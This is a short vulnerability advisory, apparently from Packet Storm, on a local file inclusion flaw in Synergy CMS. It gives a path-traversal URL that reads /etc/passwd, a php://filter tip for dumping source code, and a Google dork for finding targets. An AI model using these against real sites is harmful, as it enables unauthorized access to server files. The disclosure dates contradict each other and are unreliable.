Synergy versions 2.0 and below suffer from a local file inclusion vulnerability.
f5556b4877d925a22eb3416977c4dd37afcfbfcebd9baaf3200012cc10a4a216##################################################
Synergy CMS lfi vulnerability
##################################################
*# Product: Synergy CMS
*# Vulnerability: Post-authentication local file inclusion
*# Impact: Medium/Limited*
*# Authors: Jan Hodermarsky and Lukas Andruska
*# Vendor Homepage: http://www.s-e.lt
*# Affected versions: <= 2.0
*# Tested on: Mozilla Firefox 36
*# Google Dork: intext:"Svetainių kūrimas: "Synergy Effect"
[05/01/2015] - Vulnerabilities discovered
[07/01/2011] - Issues reported to the vendor [www.s-e.lt]
[12/01/2012] - Public disclosure
*# Exploit
domain.com/index.php?admin=1&body=../../../../../etc/passwd
If there is no security measure at place like openbasedir, then you're free to load any local files on the server.
http://domain.com/index.php?admin=1&body=../../../../../etc/passwd
If allow_url(fopen|include) is enabled on server, you can use PHP wrappers (e.g. php://filter) to see the source code of files which have Smarty framework in use.
Loading files which use Smarty framework (like ../includes/get.php) directly without a wrapper will cause a PHP error.
===========================================[End]=============================================�
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed